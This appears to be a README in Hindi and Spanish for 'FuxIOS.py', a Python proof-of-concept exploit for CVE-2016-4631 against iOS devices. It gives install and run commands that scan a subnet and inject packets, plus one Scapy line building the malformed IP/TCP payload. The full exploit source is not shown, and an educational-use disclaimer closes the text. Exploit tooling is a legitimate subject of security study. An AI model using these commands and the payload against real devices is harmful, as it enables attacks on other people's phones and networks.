
iOS उपकरणों को लक्षित करने वाले CVE-2016-4631 के लिए आधुनिकीकृत Python 3 एक्सप्लॉइट PoC। इसमें नेटवर्क स्कैनिंग, विकृत IP/TCP पेलोड जनरेशन, और अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए पैकेट इंजेक्शन शामिल हैं।
मैं यह अब क्यों प्रकाशित कर रहा हूँ?
पुरानी हार्ड ड्राइव और भूली हुई रिपॉजिटरीज की जाँच करते समय, मुझे यह स्क्रिप्ट मिली जो मैंने वर्षों पहले लिखी थी जब मैंने साइबर सुरक्षा में अपना करियर शुरू ही किया था। यह एक अलग समय था - Python 2.7 का बोलबाला था, CVE-2016-4631 जैसी कमज़ोरियाँ आम बात थीं, और हर काम करने वाला PoC एक छोटी सी जीत जैसा लगता था।
इतने समय बाद इस कोड को देखकर, मैं पुरानी यादों में खो गया। मुझे वे रातें याद आईं जब मैं एक्सप्लॉइट डीबग करता था, "Payload sent successfully" देखने का उत्साह, और कैसे हर स्क्रिप्ट मेरी सीखने की यात्रा में एक कदम आगे थी। हालाँकि आज मैं कहीं अधिक उन्नत तकनीकों के साथ काम करता हूँ, यह छोटी सी स्क्रिप्ट आक्रामक सुरक्षा की दुनिया में उन पहले कदमों का प्रतिनिधित्व करती है।
मैंने इसे आधुनिक बनाने और अपलोड करने का फैसला केवल पुरानी यादों के कारण नहीं, बल्कि इसलिए किया क्योंकि मुझे लगता है कि यह उन लोगों के लिए उपयोगी हो सकता है जो साइबर सुरक्षा में अपनी यात्रा शुरू कर रहे हैं। यह एक याद दिलाता है कि हम सबने कहीं न कहीं से शुरुआत की थी, और वे पहली "सरल" स्क्रिप्ट ही वह नींव हैं जिस पर बाकी सब कुछ बनता है।
F0LloW_Th3_R4ts उस समय मेरा हस्ताक्षर था... कुछ कोड कभी नहीं भूलते। 🐀
- BONKERS, जुलाई 2025
FuxIOS.py एक अद्यतन प्रूफ ऑफ कॉन्सेप्ट (PoC) है जो CVE-2016-4631 कमज़ोरी के लिए है जो iOS उपकरणों को प्रभावित करती है। इस संस्करण को पूरी तरह से Python 3 के लिए पुनः लिखा और आधुनिक बनाया गया है, जिसमें कार्यक्षमता, सुरक्षा और उपयोगिता में महत्वपूर्ण सुधार हैं।
list_of_ips → list_ips# Instalar nmap (requerido por python-nmap)
# Windows: Descargar desde https://nmap.org/download.html
# Linux: sudo apt-get install nmap
# macOS: brew install nmap
# Clonar repositorio
git clone <repo-url>
cd FuxiOS
# Instalar dependencias
pip install -r requirements.txt
# O manualmente:
pip install scapy python-nmap
# Uso básico
sudo python3 FuxIOS.py
# Configuración personalizada
sudo python3 FuxIOS.py -s 192.168.1.100 -n 192.168.1.0/24
# Opciones avanzadas
sudo python3 FuxIOS.py -s 192.168.1.100 -n 192.168.1.0/24 -m 50 -d 0.1
# Ver ayuda
python3 FuxIOS.py -h
sudo python3 FuxIOS.py --interactive
-s, --source: आक्रमण का स्रोत IP (डिफ़ॉल्ट: 192.168.1.95)-n, --network: लक्ष्य सबनेट (डिफ़ॉल्ट: 192.168.1.0/24)-m, --max-payload: अधिकतम पेलोड आकार (डिफ़ॉल्ट: 40)-d, --delay: पैकेट के बीच देरी सेकंड में (डिफ़ॉल्ट: 0.2)--interactive: अनुकूलता के लिए इंटरैक्टिव मोड# Paquete malicioso
IP(src=source_ip, dst=target_ip, options=malformed_payload) /
TCP(dport=80, flags="S", options=[(19, b"x"*18), (19, b"x"*18)])
इस उपकरण का उपयोग केवल इसके लिए किया जाना चाहिए:
लॉग fuxios_exploit.log में सहेजे जाते हैं और इसमें शामिल हैं:
त्रुटि: "No module named 'scapy'"
pip install scapy
त्रुटि: "No module named 'nmap'"
pip install python-nmap
# Y asegúrate de tener nmap instalado en el sistema
त्रुटि: "Permission denied"
# Linux/macOS
sudo python3 FuxIOS.py
# Windows
# Ejecutar PowerShell/CMD como administrador
Windows: "WinPcap/Npcap not found"
यह प्रोजेक्ट केवल शैक्षिक उद्देश्यों के लिए है। लेखक इस उपकरण के दुरुपयोग के लिए जिम्मेदार नहीं है।
याद रखें: "F0LloW_Th3_R4ts <:8)~~ <:8)~~"